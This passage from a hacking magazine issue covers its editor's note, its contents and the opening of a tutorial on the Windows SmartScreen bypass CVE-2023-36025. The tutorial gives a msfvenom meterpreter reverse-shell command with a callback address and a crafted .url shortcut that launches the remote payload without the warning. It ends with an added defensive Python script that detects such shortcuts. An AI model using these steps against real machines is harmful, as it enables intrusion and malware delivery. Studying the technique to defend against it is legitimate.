Hackercool Magazine, Edition 7 Issue 02, February 2024
Simplifying Cyber Security since 2016

Cover stories: INITIAL ACCESS: Exploiting Windows Defender SmartScreen Security Bypass. INFECTION CHAIN: From HTA file to payload via PowerShell script and DLL file, the Black Hat hacker style. BYPASSING AV / EDR: How Black Hat hackers are using GitHub commit messages to hide their malicious activity.

Copyright © 2016 - 2024 Hackercool CyberSecurity (OPC) Pvt Ltd | All rights reserved. No part of this publication may be reproduced, distributed, or transmitted in any form or by any means, including photocopying, recording, or other electronic or mechanical methods, without the prior written permission of the publisher, except in the case of brief quotations embodied in critical reviews and certain other noncommercial uses permitted by copyright law. For permission requests, write to the publisher, addressed "Attention: Permissions Coordinator," at the address below.

Any references to historical events, real people, or real places are used fictitiously. Names, characters, and places are products of the author's imagination.

Hackercool Cybersecurity (OPC) Pvt Ltd. Banjara Hills, Hyderabad 50003. Telangana, India.
Website: www.hackercoolmagazine.com
Email Address: [illegible in source]

Information provided in this Magazine is strictly for educational purposes only. Please don't misuse this knowledge to hack into devices or networks without taking permission. The Magazine will not take any responsibility for misuse of this information.

"Then you will know the truth and the truth will set you free." John 8:32

Editor's Note
Edition 7 Issue 2

Hello readers, this is Kalyan Chinta with the latest Issue of Hackercool Magazine. Let's give you a quick summary of what this Issue contains. The first article of this Issue is how to exploit a vulnerability in Windows Defender SmartScreen (CVE-2023-36025) that is already popular with Black Hat Hackers around the world.
This vulnerability describes how to gain initial access by bypassing Windows Defender SmartScreen. The next article brings you one of the infection chains of the Ursnif banking trojan. This infection chain starts with a zip archive containing a single HTA file. When victims click on this HTA file, it downloads and executes a PowerShell script which then downloads and executes a DLL file which finally downloads the payload and executes it on the target system. Yes, I show you how to create the infection chain. Instead of using the Ursnif trojan as payload, we will be using an msfvenom meterpreter. Next, in the Tool of the Month feature, we bring you a complete guide on the Hydra password cracker. Then, you will learn how a Black Hat Hacker group used GitHub commit messages to hide its malicious activity. Then you will learn about multiple vulnerabilities disclosed recently in Ivanti VPN appliances and their impact.

Kalyan Chinta, Founder, Hackercool Magazine

"Generative AI can be used to evade string-based YARA rules by augmenting the source code of small malware variants, effectively lowering detection rates." - Recorded Future on AI's increasing role in deepfakes and malware

INSIDE
See what our Hackercool Magazine's February 2024 Issue has in store for you.

1. Initial Access: Exploiting Windows Defender SmartScreen Security Bypass.
2. Infection Chain: Ursnif banking trojan.
3. Tool Of The Month: Hydra password cracker.
4. Cyber security: Cybersecurity for satellites is a growing challenge, as threats to space-based infrastructure grow.
5. Bypassing AV/EDR: How a Black Hat Hacker group is exploiting GitHub commit messages to hide their malicious activity.
6. Vulnerability for beginners: Learn about multiple vulnerabilities in Ivanti VPN appliances.
7. Other Useful Resources

INITIAL ACCESS
Exploiting Windows Defender SmartScreen security bypass

Threat actors exploited the Windows Defender SmartScreen security bypass vulnerability to deploy an open-source stealer called Phemedrone Stealer on target systems in January 2024. The same vulnerability was exploited by another hacker group, the one behind the Mispadu banking trojan, in the first week of February 2024. More recently, a hacker group named Water Hydra (aka DarkCasino) used a closely related bypass (tracked separately as CVE-2024-21412, which defeats the fix for this vulnerability) to deploy DarkMe malware. But what exactly is this Windows Defender SmartScreen security bypass vulnerability? To understand it, you first have to learn what Windows SmartScreen is and what it does.

Before I explain the vulnerability, let's see it in action. For this, I am using Kali Linux as the attacker machine and Windows 10 20H2 as the target system. Simply put, I create a meterpreter payload using msfvenom (the command line is partly illegible in the source; the "-f exe -o" part is reconstructed from the output, the payload and file name are as shown):

msfvenom -p windows/x64/meterpreter/reverse_http lhost=192.168.249.148 lport=80 -f exe -o met_x64_http_148_80.exe
[-] No platform was selected, choosing Msf::Module::Platform::Windows from the payload
[-] No arch selected, selecting arch: x64 from the payload
No encoder specified, outputting raw payload
Payload size: 695 bytes
Final size of exe file: 7168 bytes

Then, I host it on the attacker system using Python's built-in simple HTTP server (python3 -m http.server, which listens on port 8000 by default), as we have done many times in previous Issues. As you might expect, I download it on the target system using a browser. Normally I would just execute it, but not in this case. I right-click on the file and open its "Properties". At the bottom of the "Properties" window you should see the notice reproduced below. This message comes from Mark of the Web (MoTW), which you studied in one of our previous Issues: when a browser saves a file from the Internet, Windows records its origin in a Zone.Identifier alternate data stream attached to the file (ZoneId=3, the Internet zone), and SmartScreen consults that marker when the file is later run.
"When hackers have access to powerful computers that use brute force hacking, they can crack almost any password; even one user with insecure access being successfully hacked can result in a major breach." - Toomas Hendrik Ilves

[Screenshot: Properties dialog for met_x64_http_148_80.exe, General tab. Type of file: Application (.exe). Location: C:\Users\admin\Downloads. Size: 7.00 KB (7,168 bytes), 8.00 KB (8,192 bytes) on disk. Created/Modified: Monday, March 4, 2024. Security notice at the bottom: "This file came from another computer and might be blocked to help protect this computer." next to an "Unblock" checkbox.]

Now, I execute it by simply double-clicking the file. However, instead of giving us a meterpreter session as expected, we get a blue window. This is Windows Defender SmartScreen in action. Read the message carefully.

"It's no surprise that hackers working for North Korea, Iran's mullahs, Vladimir V. Putin in Russia, and the People's Liberation Army of China have all learned that the great advantage of cyberweapons is that they are the opposite of a nuke: hard to detect, easy to deny, and increasingly finely targeted." - David E. Sanger

[Screenshot: SmartScreen dialog, "Windows protected your PC".]

What SmartScreen did was block our app from running because it considered it malicious. Not just mine; it will block any app it considers malicious. But how does it decide that a file is malicious?

What is Microsoft Windows Defender SmartScreen?

Microsoft Defender SmartScreen is a Windows feature that protects users against phishing and malware websites, malicious applications, and the download of potentially malicious files. SmartScreen also decides whether a downloaded app is safe by checking it against a reputation list of well-known, frequently downloaded files, and against lists of reported malicious sites and programs. If a file that carries Mark of the Web is not on the well-known list, it displays the message shown above.
What is CVE-2023-36025?

CVE-2023-36025 is a Windows SmartScreen security feature bypass vulnerability. It allows attackers to bypass Windows SmartScreen altogether, by means of a crafted Internet Shortcut (.url) file, and run files on the target system without the warning shown above. Microsoft fixed it in the November 2023 Patch Tuesday updates, so the target must be missing those updates (as our Windows 10 20H2 machine is) for the technique below to work. Let us see how to exploit it to execute the meterpreter payload we used above. For this we will need a URL file.

What is a URL file?

A URL file is an Internet shortcut file. Let's see how to create one. I open a new text document on Windows (Notepad) and add this code to the file:

[InternetShortcut]
URL=http://192.168.249.148:8000/met_x64_http_148_80.exe
IDLIST=

Then, I save it with a different name but the same extension (.txt). I named it "hc_test.txt". Note that I didn't change the extension; it is still a text file.

Next, I open this "hc_test.txt" file in Notepad and use "Save As" to save it as "hc_test.url", leaving "Save as type" set to "Text Documents (*.txt)" and the encoding at UTF-8. The content is still plain text; only the extension has changed. Our URL file is ready.
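The Mark of the Web check and the .url file above, as an added example that is not part of the original article: a small Python triage script that parses a downloaded Internet Shortcut together with its Zone.Identifier stream and flags the CVE-2023-36025 pattern (a MoTW-tagged .url whose target is a remote executable, which SmartScreen never gets to inspect). The shortcut text is the one created above; the Zone.Identifier contents, the verdict thresholds and the function names are my assumptions, not the magazine's.

```python
"""Triage a downloaded Internet Shortcut (.url) together with its Mark of the
Web. Added example for this article; it is not code from Hackercool Magazine.
The sample files below are constructed for illustration."""
import configparser
import os
from urllib.parse import urlparse

# URLZONE values the Attachment Execution Service writes into the
# Zone.Identifier alternate data stream (3 = Internet is the usual MoTW).
ZONE_NAMES = {0: "Local Machine", 1: "Local Intranet", 2: "Trusted Sites",
              3: "Internet", 4: "Restricted Sites"}

# Target types a shortcut should never need to launch from a remote host.
RISKY_EXTENSIONS = {".exe", ".dll", ".cpl", ".scr", ".msi", ".hta",
                    ".js", ".vbs", ".bat", ".cmd", ".ps1"}


def _read_ini(text):
    """Parse INI-style text (Zone.Identifier and .url both use that layout).
    Only '=' is a delimiter because values contain ':' (http://...).
    Returns None when the text is not INI at all."""
    parser = configparser.ConfigParser(interpolation=None, delimiters=("=",),
                                       strict=False)
    try:
        parser.read_string(text.lstrip("\ufeff"))
    except configparser.Error:
        return None
    return parser


def _section(parser, name):
    """Case-insensitive section lookup ([InternetShortcut] vs [internetshortcut])."""
    for candidate in parser.sections():
        if candidate.lower() == name.lower():
            return parser[candidate]
    return None


def parse_zone_identifier(stream_text):
    """Return {'zone_id', 'referrer_url', 'host_url'} from a Zone.Identifier stream."""
    info = {"zone_id": None, "referrer_url": None, "host_url": None}
    parser = _read_ini(stream_text or "")
    section = _section(parser, "ZoneTransfer") if parser else None
    if section is None:
        return info
    zone = section.get("ZoneId", "").strip()
    info["zone_id"] = int(zone) if zone.isdigit() else None
    info["referrer_url"] = section.get("ReferrerUrl")
    info["host_url"] = section.get("HostUrl")
    return info


def parse_internet_shortcut(url_text):
    """Return the URL= target of an [InternetShortcut] file, or None."""
    parser = _read_ini(url_text or "")
    section = _section(parser, "InternetShortcut") if parser else None
    return None if section is None else section.get("URL")


def assess_shortcut(url_text, zone_text=None):
    """Classify a .url file as 'allow', 'review', 'block' or 'not-a-shortcut'.
    'block' is the CVE-2023-36025 pattern: the shortcut's target is a remote
    executable, so SmartScreen reputation never sees the file that runs."""
    target = parse_internet_shortcut(url_text)
    if target is None:
        return "not-a-shortcut", []
    reasons = []
    parsed = urlparse(target.strip())
    zone_id = parse_zone_identifier(zone_text)["zone_id"] if zone_text else None
    if zone_id in (3, 4):
        reasons.append(f"shortcut carries MoTW (ZoneId={zone_id}, {ZONE_NAMES[zone_id]})")
    remote = parsed.scheme in ("http", "https", "ftp") or (
        parsed.scheme == "file" and bool(parsed.netloc))  # \\host\share or WebDAV
    if remote:
        reasons.append(f"target is remote: {parsed.scheme}://{parsed.netloc}")
    extension = os.path.splitext(parsed.path)[1].lower()
    risky = extension in RISKY_EXTENSIONS
    if risky:
        reasons.append(f"target is an executable type ({extension})")
    if remote and risky:
        return "block", reasons
    if risky or (remote and zone_id in (3, 4)):
        return "review", reasons
    return "allow", reasons


def triage_file(path):
    """Read a .url file and its Zone.Identifier stream from disk (Windows/NTFS;
    the ':Zone.Identifier' suffix opens the alternate data stream)."""
    with open(path, encoding="utf-8", errors="replace") as fh:
        url_text = fh.read()
    try:
        with open(path + ":Zone.Identifier", encoding="utf-8", errors="replace") as fh:
            zone_text = fh.read()
    except OSError:  # no MoTW, or not an NTFS volume
        zone_text = None
    return assess_shortcut(url_text, zone_text)


# Constructed sample: the shortcut from this article as a browser would store
# it after download (the Zone.Identifier contents are an assumption).
SAMPLE_URL = "[InternetShortcut]\nURL=http://192.168.249.148:8000/met_x64_http_148_80.exe\nIDLIST=\n"
SAMPLE_ZONE = ("[ZoneTransfer]\nZoneId=3\nReferrerUrl=http://192.168.249.148:8000/\n"
               "HostUrl=http://192.168.249.148:8000/hc_test.url\n")
BENIGN_URL = "[InternetShortcut]\nURL=https://www.hackercoolmagazine.com/\n"

if __name__ == "__main__":
    for label, url_text in (("article shortcut", SAMPLE_URL), ("benign bookmark", BENIGN_URL)):
        verdict, reasons = assess_shortcut(url_text, SAMPLE_ZONE)
        print(f"{label}: {verdict}")
        for reason in reasons:
            print(f"  - {reason}")
```

Run it on the target with `triage_file(r"C:\Users\admin\Downloads\hc_test.url")` to see the verdict for a real download; the `:Zone.Identifier` open only works on NTFS, which is also why copying a file through a FAT-formatted USB stick or certain archive tools silently strips the mark. The point of the `block` rule is that SmartScreen's reputation check is applied to the file the user double-clicks, and a shortcut whose target lives on a remote host hands execution to something that check never examined.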
